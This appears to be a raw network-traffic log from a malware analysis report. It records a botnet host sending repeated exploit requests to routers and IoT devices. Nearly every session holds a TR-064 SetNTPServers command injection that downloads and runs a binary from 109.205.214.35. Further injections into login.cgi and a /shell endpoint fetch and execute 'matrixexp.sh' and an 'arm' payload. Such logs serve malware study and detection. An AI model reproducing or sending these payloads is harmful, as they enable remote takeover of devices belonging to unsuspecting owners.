                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:10.786273956 CET76INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0
                                                        Mar 21, 2024 05:23:12.241884947 CET76INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1032192.168.2.1358490216.239.179.2057547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.527121067 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.279320955 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1033192.168.2.134593088.206.97.1137547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.626807928 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.853077888 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:13.293586016 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1034192.168.2.1346816220.211.175.2457547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.788530111 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.658124924 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.941575050 CET76INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1035192.168.2.1347060182.52.146.167547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:10.855998993 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1036192.168.2.135033237.75.205.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.062207937 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.268541098 CET190INHTTP/1.1 404 Not Found
                                                        Date: THU MAR 21 07:23:11 2024
                                                        Server: cwmp server
                                                        Connection: close
                                                        Content-Length: 14
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1037192.168.2.1347070182.52.146.167547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.218976021 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1038192.168.2.135034637.75.205.897547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.271521091 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:11.916233063 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:12.137516022 CET190INHTTP/1.1 404 Not Found
                                                        Date: THU MAR 21 07:23:11 2024
                                                        Server: cwmp server
                                                        Connection: close
                                                        Content-Length: 14
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1039192.168.2.1335620211.225.199.2317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.343827009 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:12.782048941 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:14.511323929 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:17.932236910 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:24.844228029 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:38.675350904 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1040192.168.2.135695023.194.109.15980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.495657921 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:11.583673954 CET430INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 208
                                                        Expires: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 37 63 63 30 31 37 26 23 34 36 3b 31 37 31 30 39 39 34 39 39 31 26 23 34 36 3b 35 65 64 35 62 36 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;767cc017&#46;1710994991&#46;5ed5b6e</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1041192.168.2.1357300182.239.112.15280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.496288061 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1042192.168.2.135649637.36.79.767547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.511403084 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1043192.168.2.133562272.141.50.137547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.529675007 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:17.427335024 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1044192.168.2.1335632211.225.199.2317547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:11.628057957 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:13.100266933 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:14.829193115 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
